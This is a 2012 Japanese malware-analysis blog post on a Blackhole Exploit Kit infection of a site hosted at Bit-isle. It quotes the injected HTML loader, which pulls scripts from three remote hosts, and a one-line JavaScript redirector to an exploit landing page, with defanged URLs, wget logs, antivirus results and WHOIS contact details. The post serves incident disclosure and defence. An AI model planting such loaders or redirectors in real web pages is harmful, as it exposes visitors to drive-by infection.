金曜日, 5月 04, 2012

#OCJP-042:BIT-ISLE(ビットアイル)のVPSお客様がBlackhole Infectorマルウェアに感染されました。 【対応最中】


この事件もblackhole Exploit Kitに感染された企業ウェブサイトの事件です。
タイミングとストーリー的には#OCJP-041と同じ状況ですが、本件の方が5月3日(最新版)の感染なので、blackholeのscriptダウンロードサイトとbackholeの「landing」サイトが未だアップされている状況ですね。下記さっそく詳細情報に行きます↓

■下記のサーバ/IPアドレス↓

egle1.hannnari.com / 112.140.42.29
下記のURL↓
hxxp://egle1.hannnari.com/Vkiri9Fg/index.html

■ダウンロード証拠↓

--01:29:44-- hxxp://egle1.hannnari.com/Vkiri9Fg/index.html => `index.html' Resolving egle1.hannnari.com... 112.140.42.29 Connecting to egle1.hannnari.com|112.140.42.29|:80... connected. HTTP request sent, awaiting response... 200 OK Cookie coming from egle1.hannnari.com attempted to set domain to shinobi.jp Length: 338 [text/html] 100%[====================================>] 338 --.--K/s 01:29:44 (6.24 MB/s) - `index.html' saved [338/338]

■マルウェアファイル情報↓

形的には普通のテキストファイル↓ ↑日付けを見たら5月3日に本ファイルがインジェクトされたそうです

このファイルを実行すると下記のように出ます↓

WAIT PLEASE

Loading...

中には下記のコードが書いてあります↓

$ cat index.html <html> <h1>WAIT PLEASE</h1> <h3>Loading...</h3> <script type="text/javascript" src="hxxp://dichvuthanhlapdoanhnghiep.com.vn/QFgZH3bH/js.js"></script> <script type="text/javascript" src="hxxp://cografyasin.com/hDW2exkR/js.js"></script> <script type="text/javascript" src="hxxp://jn000151.ferozo.com/S5Bhj8Hb/js.js"></script> </html>

■ウイルススキャン↓

File name: index.html MD5: 26199cc070d133f7edebb25a3c0f46f4 File size: 338 バイト ( 338 bytes ) File type: HTML Detection ratio: 15 / 42 Analysis date: 2012-05-03 16:39:05 UTC Result Link: [CLICK]

■マルウェア調査

上記のコードの中に3つjavascriptのURLがあります↓
(1) hxxp://dichvuthanhlapdoanhnghiep.com.vn/QFgZH3bH/js.js (2) hxxp://cografyasin.com/hDW2exkR/js.js (3) hxxp://jn000151.ferozo.com/S5Bhj8Hb/js.js

上記のURLには全部アクセスが出来てますので、非常に危険です、証拠↓

--01:59:24-- hxxp://dichvuthanhlapdoanhnghiep.com.vn/QFgZH3bH/js.js => `js.js' Resolving dichvuthanhlapdoanhnghiep.com.vn... 112.78.2.175 Connecting to dichvuthanhlapdoanhnghiep.com.vn|112.78.2.175|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 75 [application/javascript] 100%[====================================>] 75 --.--K/s 01:59:25 (1.54 MB/s) - `js.js' saved [75/75] --01:59:36-- hxxp://cografyasin.com/hDW2exkR/js.js => `js.js.3' Resolving cografyasin.com... 87.106.86.246 Connecting to cografyasin.com|87.106.86.246|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 75 [text/x-js] 100%[====================================>] 75 --.--K/s 01:59:36 (2.64 MB/s) - `js.js.3' saved [75/75] --02:00:07-- hxxp://jn000151.ferozo.com/S5Bhj8Hb/js.js => `js.js.4' Resolving jn000151.ferozo.com... 200.58.111.46 Connecting to jn000151.ferozo.com|200.58.111.46|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 75 [application/x-javascript] 100%[====================================>] 75 --.--K/s 02:00:08 (2.08 MB/s) - `js.js.4' saved [75/75]

上記のファイルは同じ物です。中身は $ cat js.js

document.location='hxxp://74.91.121.237/showthread.php?t=d7ad916d1c0396ff';

↑コードの意味は、ユーザが別のURLに飛ばされます。 74.91.121.237のサイトにアクセスしたら現在ダウンですので、スクリーンショットを取るのは不可能です。 ↑ブラックリスト履歴書に調査したらそのページに実は別のjavascriptマルウェアがあり、 そのファイルにAdobe exploit shellcodeが入りました。 マルウェアjavascriptを実行されたらパソコンにexploitコードが来る、 もしパソコンのAdobe脆弱性に当たったらマルウェアのダウンローダープログラムがPCに 保存されて実行してしまいます。 尚、「js.js」マルウェアファイルをスキャンしたら下記の結果が出ます↓

F-Secure : Trojan.JS.Redirector.AJX GData : Trojan.JS.Redirector.AJX VIPRE : Heur.JS.BlacoleRedir (v) McAfee-GW-Edition : JS/Blacole-Redirector Avast : JS:Redirector-UE [Trj] nProtect : Trojan.JS.Redirector.AJX BitDefender : Trojan.JS.Redirector.AJX McAfee : JS/Blacole-Redirector TheHacker : Trojan/Js.gen Comodo : UnclassifiedMalware

ウイルススキャンのレポートは↓

File name: js.js MD5: 87c951d8d019cf9bfe4e23112f9f365d File size: 75 バイト ( 75 bytes ) File type: Text Detection ratio: 12 / 40 Analysis date: 2012-05-03 16:31:12 UTC Result: [CLICK]

■感染されたネットワーク情報↓

ドメイン登録情報と責任者情報:
Domain Name: hannnari.com Created On: 2007-03-26 07:20:20.0 Last Updated On: 2012-02-21 14:42:21.0 Expiration Date: 2013-03-26 07:20:20.0 Status: ACTIVE Registrant Name: kenichi kashiwagi Registrant Organization: Samurai Factory Inc. Registrant Street1: 16-28 Nanpeidai-cho Registrant Street2: Registrant City: Shibuya-ku Registrant State: Tokyo Registrant Postal Code: 150-0036 Registrant Country: JP Registrant Phone: 0362775281 Registrant Fax: Registrant Email: domainregist@ml.ninja.co.jp

Internet/Network Information: [ネットワーク情報]

IP ADDRESS: 112.140.42.29 inetnum: 112.140.32.0 - 112.140.63.255 netname: BI-CDN-IX descr: Bit-isle descr: 2-2-43 Higashi-shinagawa,Shinagawa-ku,Tokyo country: JP admin-c: JNIC1-AP tech-c: JNIC1-AP status: ALLOCATED PORTABLE remarks: Email address for spam or abuse complaints abuse@bit-isle.co.jp changed: hm-changed@apnic.net 20090209 mnt-by: MAINT-JPNIC mnt-lower: MAINT-JPNIC source: APNIC inetnum: 112.140.42.0 - 112.140.42.255 netname: SF-SERVICE01 descr: Samurai Factory Inc. country: JP admin-c: JR594JP tech-c: JR594JP remarks: This information has been partially mirrored by APNIC from remarks: JPNIC. To obtain more specific information, please use the remarks: JPNIC WHOIS Gateway at remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client remarks: defaults to Japanese output, use the /e switch for English remarks: output) changed: apnic-ftp@nic.ad.jp 20110620 changed: apnic-ftp@nic.ad.jp 20110914 source: JPNIC Contact Information: [担当者情報] a. [JPNICハンドル] JR594JP b. [氏名] 竜石堂 潤一 c. [Last, First] Ryusekido, Junichi d. [電子メイル] domainregist@ml.ninja.co.jp f. [組織名] 株式会社サムライファクトリー g. [Organization] Samurai Factory Inc. グラフ↓

■注意点↓

blackholeサイトの管理者が本ネットワークを狙ったものだと思われます。 exloit検索のオートメーションツールを使えばウェブ脆弱性が分かるので、 その経由で本件のマルウェア感染ファイルがインジェクトされたようです。 もし上記の情報が当たったら、本IPに220ドメインがありますので、 感染が増える可能性が出ます、ご注意下さい。 早めにウェブ脆弱性を直したほうがいいと思います。 下記は220個ドメインの情報↓ グラフの証拠↓
---
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.

0 件のコメント:

コメントを投稿